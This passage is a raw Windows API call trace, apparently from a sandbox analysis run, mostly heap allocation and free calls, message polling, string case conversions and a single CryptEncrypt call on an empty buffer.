RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0150.242] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0150.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0150.242] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0150.242] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0150.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0150.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0150.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0150.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e48 | out: hHeap=0x2af0000) returned 1 [0150.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0150.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0150.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0150.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0150.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0150.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0150.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0150.243] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0150.243] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0150.243] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0150.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f58 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a744c0 [0150.243] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0150.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0150.244] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0150.244] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0150.244] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0150.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0150.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0150.245] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a744c0 | out: hHeap=0x2af0000) returned 1 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.245] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0150.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0150.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0150.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0150.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.245] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0150.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0150.245] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0150.246] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0150.246] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0150.246] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0150.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0150.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0150.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0150.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0150.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0150.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0150.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0150.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0150.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0150.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa438, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0150.249] CryptEncrypt (in: hKey=0x9e20b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0150.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.249] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0150.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.249] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.249] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.249] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.250] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 